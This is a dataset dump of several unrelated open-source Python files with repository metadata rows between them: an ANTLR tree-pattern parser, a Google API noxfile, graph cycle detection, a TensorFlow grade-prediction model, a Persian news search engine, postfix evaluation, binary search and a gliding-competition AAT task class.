__idChar = __idStartChar | frozenset('0123456789')
def nextToken(self):
self.sval = ''
while self.c != EOF:
if self.c in (' ', '\n', '\r', '\t'):
self.consume()
continue
if self.c in self.__idStartChar:
self.sval += self.c
self.consume()
while self.c in self.__idChar:
self.sval += self.c
self.consume()
return ID
if self.c == '(':
self.consume()
return BEGIN
if self.c == ')':
self.consume()
return END
if self.c == '%':
self.consume()
return PERCENT
if self.c == ':':
self.consume()
return COLON
if self.c == '.':
self.consume()
return DOT
if self.c == '[': # grab [x] as a string, returning x
self.consume()
while self.c != ']':
if self.c == '\\':
self.consume()
if self.c != ']':
self.sval += '\\'
self.sval += self.c
else:
self.sval += self.c
self.consume()
self.consume()
return ARG
self.consume()
self.error = True
return EOF
return EOF
def consume(self):
self.p += 1
if self.p >= self.n:
self.c = EOF
else:
self.c = self.pattern[self.p]
class TreePatternParser(object):
def __init__(self, tokenizer, wizard, adaptor):
self.tokenizer = tokenizer
self.wizard = wizard
self.adaptor = adaptor
self.ttype = tokenizer.nextToken() # kickstart
def pattern(self):
if self.ttype == BEGIN:
return self.parseTree()
elif self.ttype == ID:
node = self.parseNode()
if self.ttype == EOF:
return node
return None # extra junk on end
return None
def parseTree(self):
if self.ttype != BEGIN:
return None
self.ttype = self.tokenizer.nextToken()
root = self.parseNode()
if root is None:
return None
while self.ttype in (BEGIN, ID, PERCENT, DOT):
if self.ttype == BEGIN:
subtree = self.parseTree()
self.adaptor.addChild(root, subtree)
else:
child = self.parseNode()
if child is None:
return None
self.adaptor.addChild(root, child)
if self.ttype != END:
return None
self.ttype = self.tokenizer.nextToken()
return root
def parseNode(self):
# "%label:" prefix
label = None
if self.ttype == PERCENT:
self.ttype = self.tokenizer.nextToken()
if self.ttype != ID:
return None
label = self.tokenizer.sval
self.ttype = self.tokenizer.nextToken()
if self.ttype != COLON:
return None
self.ttype = self.tokenizer.nextToken() # move to ID following colon
# Wildcard?
if self.ttype == DOT:
self.ttype = self.tokenizer.nextToken()
wildcardPayload = CommonToken(0, '.')
node = WildcardTreePattern(wildcardPayload)
if label is not None:
node.label = label
return node
# "ID" or "ID[arg]"
if self.ttype != ID:
return None
tokenName = self.tokenizer.sval
self.ttype = self.tokenizer.nextToken()
if tokenName == 'nil':
return self.adaptor.nil()
text = tokenName
# check for arg
arg = None
if self.ttype == ARG:
arg = self.tokenizer.sval
text = arg
self.ttype = self.tokenizer.nextToken()
# create node
treeNodeType = self.wizard.getTokenType(tokenName)
if treeNodeType == INVALID_TOKEN_TYPE:
return None
node = self.adaptor.createFromType(treeNodeType, text)
if label is not None and isinstance(node, TreePattern):
node.label = label
if arg is not None and isinstance(node, TreePattern):
node.hasTextArg = True
return node
class TreePattern(CommonTree):
"""
When using %label:TOKENNAME in a tree for parse(), we must
track the label.
"""
def __init__(self, payload):
CommonTree.__init__(self, payload)
self.label = None
self.hasTextArg = None
def toString(self):
if self.label is not None:
return '%' + self.label + ':' + CommonTree.toString(self)
else:
return CommonTree.toString(self)
class WildcardTreePattern(TreePattern):
pass
class TreePatternTreeAdaptor(CommonTreeAdaptor):
"""This adaptor creates TreePattern objects for use during scan()"""
def createWithPayload(self, payload):
return TreePattern(payload)
class TreeWizard(object):
"""
Build and navigate trees with this object. Must know about the names
of tokens so you have to pass in a map or array of token names (from which
this class can build the map). I.e., Token DECL means nothing unless the
class can translate it to a token type.
In order to create nodes and navigate, this class needs a TreeAdaptor.
This class can build a token type -> node index for repeated use or for
iterating over the various nodes with a particular type.
This class works in conjunction with the TreeAdaptor rather than moving
all this functionality into the adaptor. An adaptor helps build and
navigate trees using methods. This class helps you do it with string
patterns like "(A B C)". You can create a tree from that pattern or
match subtrees against it.
"""
def __init__(self, adaptor=None, tokenNames=None, typeMap=None):
self.adaptor = adaptor
if typeMap is None:
self.tokenNameToTypeMap = computeTokenTypes(tokenNames)
else:
if tokenNames is not None:
raise ValueError("Can't have both tokenNames and typeMap")
self.tokenNameToTypeMap = typeMap
def getTokenType(self, tokenName):
"""Using the map of token names to token types, return the type."""
try:
return self.tokenNameToTypeMap[tokenName]
except KeyError:
return INVALID_TOKEN_TYPE
def create(self, pattern):
"""
Create a tree or node from the indicated tree pattern that closely
follows ANTLR tree grammar tree element syntax:
(root child1 ... child2).
You can also just pass in a node: ID
Any node can have a text argument: ID[foo]
(notice there are no quotes around foo--it's clear it's a string).
nil is a special name meaning "give me a nil node". Useful for
making lists: (nil A B C) is a list of A B C.
"""
tokenizer = TreePatternLexer(pattern)
parser = TreePatternParser(tokenizer, self, self.adaptor)
return parser.pattern()
def index(self, tree):
"""Walk the entire tree and make a node name to nodes mapping.
For now, use recursion but later nonrecursive version may be
more efficient. Returns a dict int -> list where the list is
of your AST node type. The int is the token type of the node.
"""
m = {}
self._index(tree, m)
return m
def _index(self, t, m):
"""Do the work for index"""
if t is None:
return
ttype = self.adaptor.getType(t)
elements = m.get(ttype)
if elements is None:
m[ttype] = elements = []
elements.append(t)
for i in range(self.adaptor.getChildCount(t)):
child = self.adaptor.getChild(t, i)
self._index(child, m)
def find(self, tree, what):
"""Return a list of matching token.
what may either be an integer specifzing the token type to find or
a string with a pattern that must be matched.
"""
if isinstance(what, six.integer_types):
return self._findTokenType(tree, what)
elif isinstance(what, six.string_types):
return self._findPattern(tree, what)
else:
raise TypeError("'what' must be string or integer")
def _findTokenType(self, t, ttype):
"""Return a List of tree nodes with token type ttype"""
nodes = []
def visitor(tree, parent, childIndex, labels):
nodes.append(tree)
self.visit(t, ttype, visitor)
return nodes
def _findPattern(self, t, pattern):
"""Return a List of subtrees matching pattern."""
subtrees = []
# Create a TreePattern from the pattern
tokenizer = TreePatternLexer(pattern)
parser = TreePatternParser(tokenizer, self, TreePatternTreeAdaptor())
tpattern = parser.pattern()
# don't allow invalid patterns
if (tpattern is None or tpattern.isNil() or
isinstance(tpattern, WildcardTreePattern)):
return None
rootTokenType = tpattern.getType()
def visitor(tree, parent, childIndex, label):
if self._parse(tree, tpattern, None):
subtrees.append(tree)
self.visit(t, rootTokenType, visitor)
return subtrees
def visit(self, tree, what, visitor):
"""Visit every node in tree matching what, invoking the visitor.
If what is a string, it is parsed as a pattern and only matching
subtrees will be visited.
The implementation uses the root node of the pattern in combination
with visit(t, ttype, visitor) so nil-rooted patterns are not allowed.
Patterns with wildcard roots are also not allowed.
If what is an integer, it is used as a token type and visit will match
all nodes of that type (this is faster than the pattern match).
The labels arg of the visitor action method is never set (it's None)
since using a token type rather than a pattern doesn't let us set a
label.
"""
if isinstance(what, six.integer_types):
self._visitType(tree, None, 0, what, visitor)
elif isinstance(what, six.string_types):
self._visitPattern(tree, what, visitor)
else:
raise TypeError("'what' must be string or integer")
def _visitType(self, t, parent, childIndex, ttype, visitor):
"""Do the recursive work for visit"""
if t is None:
return
if self.adaptor.getType(t) == ttype:
visitor(t, parent, childIndex, None)
for i in range(self.adaptor.getChildCount(t)):
child = self.adaptor.getChild(t, i)
self._visitType(child, t, i, ttype, visitor)
def _visitPattern(self, tree, pattern, visitor):
"""
For all subtrees that match the pattern, execute the visit action.
"""
# Create a TreePattern from the pattern
tokenizer = TreePatternLexer(pattern)
parser = TreePatternParser(tokenizer, self, TreePatternTreeAdaptor())
tpattern = parser.pattern()
# don't allow invalid patterns
if (tpattern is None or tpattern.isNil() or
isinstance(tpattern, WildcardTreePattern)):
return
rootTokenType = tpattern.getType()
def rootvisitor(tree, parent, childIndex, labels):
labels = {}
if self._parse(tree, tpattern, labels):
visitor(tree, parent, childIndex, labels)
self.visit(tree, rootTokenType, rootvisitor)
def parse(self, t, pattern, labels=None):
"""
Given a pattern like (ASSIGN %lhs:ID %rhs:.) with optional labels
on the various nodes and '.' (dot) as the node/subtree wildcard,
return true if the pattern matches and fill the labels Map with
the labels pointing at the appropriate nodes. Return false if
the pattern is malformed or the tree does not match.
If a node specifies a text arg in pattern, then that must match
for that node in t.
"""
tokenizer = TreePatternLexer(pattern)
parser = TreePatternParser(tokenizer, self, TreePatternTreeAdaptor())
tpattern = parser.pattern()
return self._parse(t, tpattern, labels)
def _parse(self, t1, t2, labels):
"""
Do the work for parse. Check to see if the t2 pattern fits the
structure and token types in t1. Check text if the pattern has
text arguments on nodes. Fill labels map with pointers to nodes
in tree matched against nodes in pattern with labels.
"""
# make sure both are non-null
if t1 is None or t2 is None:
return False
# check roots (wildcard matches anything)
if not isinstance(t2, WildcardTreePattern):
if self.adaptor.getType(t1) != t2.getType():
return False
if t2.hasTextArg and self.adaptor.getText(t1) != t2.getText():
return False
if t2.label is not None and labels is not None:
# map label in pattern to node in t1
labels[t2.label] = t1
# check children
n1 = self.adaptor.getChildCount(t1)
n2 = t2.getChildCount()
if n1 != n2:
return False
for i in range(n1):
child1 = self.adaptor.getChild(t1, i)
child2 = t2.getChild(i)
if not self._parse(child1, child2, labels):
return False
return True
def equals(self, t1, t2, adaptor=None):
"""
Compare t1 and t2; return true if token types/text, structure match
exactly.
The trees are examined in their entirety so that (A B) does not match
(A B C) nor (A (B C)).
"""
if adaptor is None:
adaptor = self.adaptor
return self._equals(t1, t2, adaptor)
def _equals(self, t1, t2, adaptor):
# make sure both are non-null
if t1 is None or t2 is None:
return False
# check roots
if adaptor.getType(t1) != adaptor.getType(t2):
return False
if adaptor.getText(t1) != adaptor.getText(t2):
return False
# check children
n1 = adaptor.getChildCount(t1)
n2 = adaptor.getChildCount(t2)
if n1 != n2:
return False
for i in range(n1):
child1 = adaptor.getChild(t1, i)
child2 = adaptor.getChild(t2, i)
if not self._equals(child1, child2, adaptor):
return False
return True
| [
"jonathang132298@gmail.com"
] | jonathang132298@gmail.com |
4c6b37c4b6d003a5c694b4bdd7795f7854e6f430 | 6fa701cdaa0d83caa0d3cbffe39b40e54bf3d386 | /google/cloud/managedidentities/v1beta1/managedidentities-v1beta1-py/noxfile.py | 34dc58b5f6e2c0eefe1b194e280ee2a1542d9b95 | [
"Apache-2.0"
] | permissive | oltoco/googleapis-gen | bf40cfad61b4217aca07068bd4922a86e3bbd2d5 | 00ca50bdde80906d6f62314ef4f7630b8cdb6e15 | refs/heads/master | 2023-07-17T22:11:47.848185 | 2021-08-29T20:39:47 | 2021-08-29T20:39:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,595 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import pathlib
import shutil
import subprocess
import sys
import nox # type: ignore
CURRENT_DIRECTORY = pathlib.Path(__file__).parent.absolute()
LOWER_BOUND_CONSTRAINTS_FILE = CURRENT_DIRECTORY / "constraints.txt"
PACKAGE_NAME = subprocess.check_output([sys.executable, "setup.py", "--name"], encoding="utf-8")
nox.sessions = [
"unit",
"cover",
"mypy",
"check_lower_bounds"
# exclude update_lower_bounds from default
"docs",
]
@nox.session(python=['3.6', '3.7', '3.8', '3.9'])
def unit(session):
"""Run the unit test suite."""
session.install('coverage', 'pytest', 'pytest-cov', 'asyncmock', 'pytest-asyncio')
session.install('-e', '.')
session.run(
'py.test',
'--quiet',
'--cov=google/cloud/managedidentities_v1beta1/',
'--cov-config=.coveragerc',
'--cov-report=term',
'--cov-report=html',
os.path.join('tests', 'unit', ''.join(session.posargs))
)
@nox.session(python='3.7')
def cover(session):
"""Run the final coverage report.
This outputs the coverage report aggregating coverage from the unit
test runs (not system test runs), and then erases coverage data.
"""
session.install("coverage", "pytest-cov")
session.run("coverage", "report", "--show-missing", "--fail-under=100")
session.run("coverage", "erase")
@nox.session(python=['3.6', '3.7'])
def mypy(session):
"""Run the type checker."""
session.install('mypy', 'types-pkg_resources')
session.install('.')
session.run(
'mypy',
'--explicit-package-bases',
'google',
)
@nox.session
def update_lower_bounds(session):
"""Update lower bounds in constraints.txt to match setup.py"""
session.install('google-cloud-testutils')
session.install('.')
session.run(
'lower-bound-checker',
'update',
'--package-name',
PACKAGE_NAME,
'--constraints-file',
str(LOWER_BOUND_CONSTRAINTS_FILE),
)
@nox.session
def check_lower_bounds(session):
"""Check lower bounds in setup.py are reflected in constraints file"""
session.install('google-cloud-testutils')
session.install('.')
session.run(
'lower-bound-checker',
'check',
'--package-name',
PACKAGE_NAME,
'--constraints-file',
str(LOWER_BOUND_CONSTRAINTS_FILE),
)
@nox.session(python='3.6')
def docs(session):
"""Build the docs for this library."""
session.install("-e", ".")
session.install("sphinx<3.0.0", "alabaster", "recommonmark")
shutil.rmtree(os.path.join("docs", "_build"), ignore_errors=True)
session.run(
"sphinx-build",
"-W", # warnings as errors
"-T", # show full traceback on exception
"-N", # no colors
"-b",
"html",
"-d",
os.path.join("docs", "_build", "doctrees", ""),
os.path.join("docs", ""),
os.path.join("docs", "_build", "html", ""),
)
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
691476e157765a1179b72bce27e53cd645aa1b05 | 4d5b1d7bf263449d001573ec0428bcedfc992cdf | /DS-Graphs-master/DS-Graphs-master/DS-Graphs/Detect Cycle in a directed graph using colors.py | 81e14889cd85dde7f90c9f2b00c7c579d5746610 | [] | no_license | sgupta117/Data-Structure-with-Python | bdb5b710a4c4b3e793be91973eb0a35ae4c42b96 | 82b3f10e2611e064705f41533df9aec81fa99821 | refs/heads/master | 2021-02-17T21:57:13.351016 | 2020-06-20T20:55:21 | 2020-06-20T20:55:21 | 245,129,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,289 | py | # Python program to deetect cycle in
# a directed graph
from collections import defaultdict
class Graph():
def __init__(self, V):
self.V = V
self.graph = defaultdict(list)
def addEdge(self, u, v):
self.graph[u].append(v)
def DFSUtil(self, u, color):
# GRAY : This vertex is being processed (DFS
# for this vertex has started, but not
# ended (or this vertex is in function
# call stack)
color[u] = "GRAY"
for v in self.graph[u]:
if color[v] == "GRAY":
return True
if color[v] == "WHITE" and self.DFSUtil(v, color) == True:
return True
color[u] = "BLACK"
return False
def isCyclic(self):
color = ["WHITE"] * self.V
for i in range(self.V):
if color[i] == "WHITE":
if self.DFSUtil(i, color) == True:
return True
return False
# Driver program to test above functions
g = Graph(4)
g.addEdge(0, 1)
g.addEdge(0, 2)
g.addEdge(1, 2)
g.addEdge(2, 0)
g.addEdge(2, 3)
g.addEdge(3, 3)
print
"Graph contains cycle" if g.isCyclic() == True \
else "Graph doesn't conatin cycle" | [
"noreply@github.com"
] | noreply@github.com |
4d387f41ec94b1fdbd8c41be171e0c42b85c313d | 4b28a599d495779d60f0013a11bc7954251139fa | /priorCourseGradeTF_inner.py | fa01230f5554e0fda56a579159933aa71a6b3267 | [] | no_license | JasonLC506/nittany_ai | 18653a18c3b47a55045b2e595bfccff6951706da | 1e004bf042e2939b8eefac172fa5ec45ae1c9da9 | refs/heads/master | 2020-06-17T00:14:33.076238 | 2019-07-09T15:01:35 | 2019-07-09T15:01:35 | 195,740,355 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,106 | py | import tensorflow as tf
import _pickle as cPickle
import numpy as np
import time
from tqdm import tqdm
from priorCourseGradeTF import (
data_loader,
PriorCourseGrade as PCG,
)
MAX_ITER = 10
class PriorCourseGrade(PCG):
def setup_network(self):
with tf.name_scope("embedding"):
self.embds = tf.Variable(tf.random_uniform([self.C + 1, self.K], minval=0.0, maxval=1.0),
name="embds") # self.C is bias embedding
input_grades_enlarge = tf.expand_dims(self.input_grades, axis=-1)
input_scaled_embds = tf.multiply(input_grades_enlarge, self.embds)
# maximum pooling #
self.input_embd = tf.reduce_max(input_scaled_embds, axis=1)
# output course embd #
self.output_embd = tf.nn.embedding_lookup(self.embds, self.output_course)
# with tf.name_scope("compare"):
# self.diff = tf.nn.relu(self.output_embd - self.input_embd)
#
# with tf.name_scope("predict"):
# self.predict_grade = tf.divide(1.0, tf.add(1.0, tf.reduce_sum(self.diff, axis=-1)))
self.predict_grade = tf.nn.sigmoid(tf.einsum("ij,ij->i", self.input_embd, self.output_embd))
if __name__ == "__main__":
# with open("data/cou_pre", "r") as df:
# data_cou_pre, cou_dict_inv, Ord2Grade = cPickle.load(df)
# # with open("data/cou_pre_test", "r") as df:
# # data_cou_pre, cou_dict_inv, Ord2Grade = cPickle.load(df)
# C = len(cou_dict_inv)
# data = data_generator(data_cou_pre)
# # data.C = 8900
# print(data.C)
# print(data.N)
# pcg = PriorCourseGrade(C=data.C)
# pcg.initialize()
# pcg.train(data, batch_size=256)
# with train valid test #
data_train = data_loader("data/cou_pre_train")
data_valid = data_loader("data/cou_pre_valid")
data_test = data_loader("data/cou_pre_test")
pcg = PriorCourseGrade(C=data_train.C, K=20)
pcg.initialize()
pcg.train(data_train, data_valid=data_valid, batch_size=256, save_emb=False)
pcg.restore()
pcg.evaluate(data_test) | [
"jpz5181@ist.psu.edu"
] | jpz5181@ist.psu.edu |
d3dc1c55df1dd5ceae50f340e72552e80372fff6 | 20755489698a4bfcc48d3b353a12a1b80085b923 | /persian-news-search-engine/SecondPhase/QPCL.py | 1a7d49cdef05ac8dd4fbe641e187a50f76d77ceb | [] | no_license | MehradShm/InformationRetrieval | 3f005447d5f53ec5a0b212e2308523cd5ab04ea8 | 2dcf0517ae4907f70ab2359c1bfb4564c8a58a01 | refs/heads/main | 2023-02-08T13:17:01.781851 | 2020-12-31T07:11:46 | 2020-12-31T07:11:46 | 325,738,236 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,021 | py | from UI import get_input
import numpy as np
import heapq
import pandas as pd
import random
import time
collection_size = 55109
def Load_Data(field):
df1 = pd.read_csv('data/1.csv')
df2 = pd.read_csv('data/2.csv')
df3 = pd.read_csv('data/3.csv')
df4 = pd.read_csv('data/4.csv')
df5 = pd.read_csv('data/5.csv')
df6 = pd.read_csv('data/6.csv')
a = [df1,df2,df3,df4,df5,df6]
b = [df1.shape[0],df2.shape[0],df3.shape[0],df4.shape[0],df5.shape[0],df6.shape[0]]
df_sizes = [0,df1.shape[0],df1.shape[0]+df2.shape[0],
df1.shape[0]+df2.shape[0]+df3.shape[0],
df1.shape[0]+df2.shape[0]+df3.shape[0]+df4.shape[0],
df1.shape[0]+df2.shape[0]+df3.shape[0]+df4.shape[0]+df5.shape[0],
df1.shape[0]+df2.shape[0]+df3.shape[0]+df4.shape[0]+df5.shape[0]+df6.shape[0]]
Gdata, file_index = [], 0
for doc_index in range(0,55109):
if doc_index == df_sizes[file_index+1]:
file_index += 1
target_data = a[file_index].loc[doc_index-df_sizes[file_index],field]
Gdata.append(target_data)
return (Gdata)
def Load_TFIDF():
tf_idf, count = {},0
with open("tf_idf.txt",'r') as index:
line = index.readline().split(" ")
while count < 113181:
count+=1
term, scores = line[0], line[1:-1]
if term not in tf_idf.keys():
tf_idf[term] = {}
for tmp in scores:
doc_id, score = tmp.split(":")
tf_idf[term][int(doc_id)] = float(score)
line = index.readline().split(" ")
return tf_idf
def Load_DocumentVectors():
document_vectors, count = {}, 0
with open("documentvector.txt",'r') as vectors:
line = vectors.readline().split(" ")
while count < 54481:
count+=1
doc_id, terms = int(line[0]), line[1:-1]
if doc_id not in document_vectors.keys():
document_vectors[doc_id] = {}
for tmp in terms:
term, score = tmp.split(":")
document_vectors[doc_id][term] = float(score)
line = vectors.readline().split(" ")
return document_vectors
def make_document_frequencies():
document_frequencies, count = {}, 0
with open("inverted_index.txt",'r') as index:
line = index.readline().split(" ")
while count < 113181:
count+=1
term, frequency = line[0], len(line[1:-1])
document_frequencies[term] = frequency
line = index.readline().split(" ")
return document_frequencies
def Load_Champions_Lists():
champions_lists, count = {}, 0
with open("ChampionsList.txt",'r') as champion:
line = champion.readline().split(" ")
while count < 113181:
count += 1
term, champions = line[0], map(int,line[1:-1])
champions_lists[term] = champions
line = champion.readline().split(" ")
return champions_lists
def Similarity(query , document, tf_idf, document_vectors, document_frequencies):
product, norm_query, norm_document, query_score = 0, 0, 0, 0
for term in query:
count = query[term]
query_score = (1+np.log10(count)) * np.log10(collection_size/document_frequencies[term])
if document in tf_idf[term].keys():
product += query_score * tf_idf[term][document]
norm_query += query_score ** 2
if document in document_vectors.keys():
for term in document_vectors[document]:
norm_document += document_vectors[document][term] ** 2
if norm_document !=0:
similarity = product / np.sqrt(norm_query * norm_document)
return similarity
else:
return 0
def ProcessQueriesWithChampionsList():
print("Preparing Data For Query Processing, Please Wait...")
tf_idf, document_vectors, document_frequencies, titles, contents = Load_TFIDF(), Load_DocumentVectors(), make_document_frequencies(), Load_Data('title'), Load_Data('content')
champions_lists = Load_Champions_Lists()
while True:
query = get_input()
start_time = time.time()
candidate_documents, scores = [], []
for term in query:
for doc_id in champions_lists[term]:
candidate_documents.append(doc_id)
for index in candidate_documents:
similarity = Similarity(query, index, tf_idf, document_vectors, document_frequencies)
heapq.heappush(scores, (((-1) * similarity,index)))
best = heapq.nsmallest(10,scores)
doc_IDs = [tmp[1] for tmp in best]
for i in range(10):
print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
print(str(i+1)+"." + titles[doc_IDs[i]]+ " --> ID:" + str(doc_IDs[i]+1), '\n')
print(contents[doc_IDs[i]],'\n')
print("\n", end = '')
print("--- %s seconds ---" % (time.time() - start_time))
print("\n\n")
ProcessQueriesWithChampionsList() | [
"noreply@github.com"
] | noreply@github.com |
e2ab0a6b5f834da36da9c43a403a5cbf2d0cdc65 | 760fc9cf9aabafba3f9f3cd7f5c234a6609b5ebc | /DATA-STRUCTURES/Stack/PostfixEvaluation.py | 8a459fac9c5b28824758c1dd759f94032c475b65 | [] | no_license | disha2sinha/Data-Structures-and-Algorithms | a7db12dbbdc9491efa0800d4e464481623fc7f3c | 8b58d06abf5244b6932561377290bdbd5ea146d7 | refs/heads/master | 2022-06-03T21:54:13.422645 | 2022-05-10T16:31:34 | 2022-05-10T16:31:34 | 201,489,081 | 6 | 5 | null | 2020-10-02T07:52:35 | 2019-08-09T15:01:05 | C++ | UTF-8 | Python | false | false | 835 | py | def operation(op1, op2, operator):
if operator == "+":
return op1+op2
if operator == "-":
return op1-op2
if operator == "*":
return op1*op2
if operator == "/":
return op1/op2
if operator == "^":
return op1^op2
def evaluate(exp_list):
stack = []
for i in range(len(exp_list)):
if exp_list[i] == '+' or exp_list[i] == '-' or exp_list[i] == '/' or exp_list[i] == '*' or exp_list == '^':
operand1 = int(stack.pop())
operand2 = int(stack.pop())
stack.append(operation(operand2, operand1, exp_list[i]))
else:
stack.append(exp_list[i])
return stack[-1]
expression = input("Enter Postfix Expression: ")
exp_list = list(expression)
e = evaluate(exp_list)
print("Result :",e)
| [
"noreply@github.com"
] | noreply@github.com |
a13aff91ea61f82280ceae0feb8ad248185c068d | 8c365e5d817a0bb2000b9158f23dece49725978f | /Python/Algo/Sorting/binary_sort.py | 6da33ec142d6fbaa54691ef42772b0d3d4d9d501 | [
"MIT"
] | permissive | uddeshyatyagi/Ds-Algo-ML | 7974942f8e74bbaa3330af042c3b2bc7ff4be52e | 9cd5f0dd8ec2c6df44edd9fb7e1d37d22a986d2d | refs/heads/main | 2023-02-06T05:32:57.459332 | 2020-10-23T19:24:06 | 2020-10-23T19:24:06 | 305,129,611 | 0 | 1 | MIT | 2020-10-21T07:36:33 | 2020-10-18T15:11:54 | Jupyter Notebook | UTF-8 | Python | false | false | 2,733 | py |
import bisect
def bisect_left(sorted_collection, item, lo=0, hi=None):
if hi is None:
hi = len(sorted_collection)
while lo < hi:
mid = (lo + hi) // 2
if sorted_collection[mid] < item:
lo = mid + 1
else:
hi = mid
return lo
def bisect_right(sorted_collection, item, lo=0, hi=None):
if hi is None:
hi = len(sorted_collection)
while lo < hi:
mid = (lo + hi) // 2
if sorted_collection[mid] <= item:
lo = mid + 1
else:
hi = mid
return lo
def insort_left(sorted_collection, item, lo=0, hi=None):
sorted_collection.insert(bisect_left(sorted_collection, item, lo, hi), item)
def insort_right(sorted_collection, item, lo=0, hi=None):
sorted_collection.insert(bisect_right(sorted_collection, item, lo, hi), item)
def binary_search(sorted_collection, item):
left = 0
right = len(sorted_collection) - 1
while left <= right:
midpoint = left + (right - left) // 2
current_item = sorted_collection[midpoint]
if current_item == item:
return midpoint
elif item < current_item:
right = midpoint - 1
else:
left = midpoint + 1
return None
def binary_search_std_lib(sorted_collection, item):
index = bisect.bisect_left(sorted_collection, item)
if index != len(sorted_collection) and sorted_collection[index] == item:
return index
return None
def binary_search_by_recursion(sorted_collection, item, left, right):
if right < left:
return None
midpoint = left + (right - left) // 2
if sorted_collection[midpoint] == item:
return midpoint
elif sorted_collection[midpoint] > item:
return binary_search_by_recursion(sorted_collection, item, left, midpoint - 1)
else:
return binary_search_by_recursion(sorted_collection, item, midpoint + 1, right)
def __assert_sorted(collection):
if collection != sorted(collection):
raise ValueError("Collection must be ascending sorted")
return True
if __name__ == "__main__":
import sys
user_input = input("Enter numbers separated by comma:\n").strip()
collection = [int(item) for item in user_input.split(",")]
try:
__assert_sorted(collection)
except ValueError:
sys.exit("Sequence must be ascending sorted to apply binary search")
target_input = input("Enter a single number to be found in the list:\n")
target = int(target_input)
result = binary_search(collection, target)
if result is not None:
print(f"{target} found at positions: {result}")
else:
print("Not found")
| [
"uddeshyatyagi775@gmail.com"
] | uddeshyatyagi775@gmail.com |
0f58a8a16e9d3081549963a9efac5d9f24e9b245 | dd046ba0927e651fa490780ebdd5d30eaa292595 | /api/models.py | 804d5957d3cbd8c708992e8c2f829ef61b2f4cd0 | [] | no_license | ashrafulislamemon/django-rest-Frame_notes | 5760e66b3c0672d57bb8d9a8933e8df2f516cc42 | 0af50a60a050e37f8ea4b22006cee345223ffd36 | refs/heads/master | 2023-02-13T17:33:44.094721 | 2021-01-05T15:42:59 | 2021-01-05T15:42:59 | 327,042,907 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | from django.db import models
# Create your models here.
class Student(models.Model):
name=models.CharField(max_length=30)
roll=models.IntegerField()
city=models.CharField(max_length=30)
| [
"75039527+ashrafulislamemon@users.noreply.github.com"
] | 75039527+ashrafulislamemon@users.noreply.github.com |
e517a4e977ffd0b1e18504e754d6ce20511c5237 | bcf9dd812926ffcbe57a3cfc821324913fec5391 | /opensoar/task/aat.py | a8f282a6c26cc0f662fcde6591a6e91e5472d0cc | [
"MIT"
] | permissive | jkretz/opensoar | 3e2c6fa817e87f55024f47556ea1619b3ed6b1bc | e330c4697284c1f79f85f1c2fc7400fd6246dbe0 | refs/heads/master | 2023-07-25T03:58:17.623761 | 2018-08-01T20:26:25 | 2018-08-01T20:26:25 | 153,887,721 | 0 | 0 | MIT | 2018-10-20T09:01:13 | 2018-10-20T09:01:13 | null | UTF-8 | Python | false | false | 15,624 | py | import datetime
from copy import deepcopy
from opensoar.task.task import Task
from opensoar.utilities.helper_functions import double_iterator, calculate_distance, \
calculate_bearing, calculate_destination, seconds_time_difference_fixes, add_times
class AAT(Task):
"""
Assigned Area Task.
"""
def __init__(self, waypoints, t_min: datetime.timedelta, timezone: int=None, start_opening: datetime.time=None,
start_time_buffer: int=0, multistart: bool=False):
"""
:param waypoints: see super()
:param t_min: minimal time to complete task
:param timezone: see super()
:param start_opening: see super()
:param start_time_buffer: see super()
:param multistart: see super()
"""
super().__init__(waypoints, timezone, start_opening, start_time_buffer, multistart)
self._t_min = t_min
self._nominal_distances = self._calculate_nominal_distances()
def __eq__(self, other):
if self.t_min != other.t_min:
return False
else:
return super().__eq__(other)
@property
def t_min(self):
return self._t_min
def _calculate_nominal_distances(self):
distances = list()
for start_waypoint, end_waypoint in double_iterator(self.waypoints):
distance = calculate_distance(start_waypoint.fix, end_waypoint.fix)
distances.append(distance)
return distances
def apply_rules(self, trace):
fixes, outlanding_fix = self._calculate_trip_fixes(trace)
start_time = self.determine_refined_start(trace, fixes)
distances = self._determine_trip_distances(fixes, outlanding_fix)
finish_time = self._determine_finish_time(fixes, outlanding_fix)
return fixes, start_time, outlanding_fix, distances, finish_time
def _determine_finish_time(self, fixes, outlanding_fix):
total_trip_time = seconds_time_difference_fixes(fixes[0], fixes[-1])
minimum_trip_time = self._t_min.total_seconds()
if outlanding_fix is None and total_trip_time < minimum_trip_time:
finish_time = add_times(fixes[0]['time'], self._t_min)
else:
finish_time = fixes[-1]['time']
return finish_time
def _calculate_trip_fixes(self, trace):
sector_fixes, enl_outlanding_fix = self._get_sector_fixes(trace)
reduced_sector_fixes = self._reduce_sector_fixes(sector_fixes, max_fixes_sector=300)
outlanded = len(sector_fixes) != self.no_legs+1
if outlanded:
outside_sector_fixes = self._get_outside_sector_fixes(trace, sector_fixes, enl_outlanding_fix)
reduced_outside_sector_fixes = self._reduce_fixes(outside_sector_fixes, max_fixes=300)
waypoint_fixes = self._get_waypoint_fixes(outlanded, reduced_sector_fixes, reduced_outside_sector_fixes)
max_distance_fixes = self._compute_max_distance_fixes(outlanded, waypoint_fixes)
waypoint_fixes = self._refine_max_distance_fixes(outlanded, max_distance_fixes, sector_fixes,
reduced_outside_sector_fixes)
max_distance_fixes = self._compute_max_distance_fixes(outlanded, waypoint_fixes)
trip_fixes = max_distance_fixes[:-1]
outlanding_fix = max_distance_fixes[-1]
else:
max_distance_fixes = self._compute_max_distance_fixes(outlanded, reduced_sector_fixes)
waypoint_fixes = self._refine_max_distance_fixes(outlanded, max_distance_fixes, sector_fixes)
max_distance_fixes = self._compute_max_distance_fixes(outlanded, waypoint_fixes)
trip_fixes = max_distance_fixes
outlanding_fix = None
return trip_fixes, outlanding_fix
